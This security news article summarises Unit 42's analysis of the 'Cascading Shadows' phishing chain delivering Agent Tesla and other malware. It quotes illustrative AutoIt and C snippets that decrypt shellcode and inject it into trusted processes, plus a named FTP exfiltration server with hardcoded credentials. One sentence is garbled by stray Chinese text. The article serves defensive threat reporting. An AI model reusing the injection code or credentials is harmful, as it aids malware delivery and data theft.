A sophisticated phishing campaign leveraging a multi-layered attack chain dubbed “Cascading Shadows” has been uncovered by the Palo Alto Networks’ Unit 42 researchers in December 2024.

This campaign delivers malware families like Agent Tesla, RemcosRAT, and XLoader through a sequence of deliberately fragmented stages designed to bypass traditional security tools and complicate forensic analysis.

The attackers使用了deceptive emails伪装成订单发布请求, tricking victims into opening malicious .7z archive attachments. Once activated, the infection chain progresses through JavaScript-encoded (.jse) files, PowerShell scripts, and culminates in either .NET or AutoIt-compiled executables that inject final payloads into legitimate system processes.

The attack’s modular design ensures no single stage reveals the full malicious intent. Initial phishing emails, often written in Croatian, impersonate legitimate business communications, such as payment confirmations or order reviews.

The attached .7z archive contains a .jse file masquerading as a document (e.g., doc00290320092.jse). When executed, this script downloads a PowerShell payload from domains like files.catbox[.]moe, which subsequently retrieves either a .NET or AutoIt dropper.

This bifurcation in execution paths—a hallmark of the Cascading Shadows chain—enhances resilience against detection by allowing attackers to switch payloads dynamically.

Palo Alto Networks analysts noted that the campaign’s reliance on process hollowing distinguishes it from conventional malware delivery methods.

By injecting decrypted shellcode into trusted processes like RegAsm.exe or RegSvcs.exe, the malware operates under the guise of legitimate Microsoft utilities.

This technique, combined with minimal obfuscation at early stages, allows the attack chain to evade sandbox analysis while maintaining operational flexibility.

Despite its complexity, Advanced WildFire’s memory-scanning capabilities successfully identified all stages, underscoring the importance of behavioral detection in countering layered threats.

The AutoIt Execution Path: A Study in Evasion

One of the campaign’s most novel aspects is its use of AutoIt-compiled executables, a less common approach in modern malware distribution.

AutoIt, a scripting language for automating Windows GUI interactions, is repurposed here to decrypt and execute shellcode.

The script within the AutoIt binary (e.g., c93e37e35c4c7f767a5bdab8341d8c2351edb769a41b0c9c229c592dbfe14ff2) contains an encrypted payload that dynamically resolves API calls to evade static analysis.

The script writes the decrypted shellcode to memory before injecting it into RegSvcs.exe.

Func DecryptPayload()
    Local $encrypted = "9A3F...DAC1"  ; Truncated AES-encrypted shellcode
    Local $key = "B2E8...F7A9"
    Local $decrypted = _AES_Decrypt($encrypted, $key)
    Local $process = Run("RegSvcs.exe", "", @SW_HIDE)
    _InjectShellcode($process, $decrypted)
EndFunc

The shellcode employs a reflectivе loading technique to execute a .NET executable in memory, bypassing disk-based antivirus scans.

During debugging in IDA Pro, researchers traced the execution flow to the DLLCALLADDRESS function, which resolves critical API addresses like VirtualAlloc and CreateRemoteThread.

This enables the shellcode to allocate memory in the target process, write the decrypted .NET payload, and initiate execution—all without leaving artifacts on the filesystem.

void ShellcodeMain() {
    HMODULE kernel32 = LoadLibraryA("kernel32.dll");
    FARPROC virtAlloc = GetProcAddress(kernel32, "VirtualAlloc");
    LPVOID mem = virtAlloc(NULL, 0x1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    // Decrypt and copy Agent Tesla variant into memory
    memcpy(mem, decryptedPayload, payloadSize);
    CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)mem, NULL, 0, NULL);
}

The final payload, an Agent Tesla variant, exfiltrates credentials via FTP to servers like ftp.jeepcommerce[.]rs using hardcoded credentials (e.g., username: kel-bin@jeepcommerce[.]rs, password: Jhrn) GcpiYQ7).

By compartmentalizing each stage and leveraging legitimate tools, the Cascading Shadows chain exemplifies the growing trend of “living-off-the-land” tactics in cyber espionage.

Unit 42 emphasizes that while the attack chain is intricate, defenses like Cortex XDR’s Behavioral Threat Protection can detect process injection anomalies. Combined with Advanced WildFire’s multi-stage analysis, organizations can mitigate such threats despite their evolving complexity.

Malware Trends Report Based on 15000 SOC Teams Incidents, Q1 2025 out!-> Get Your Free Copy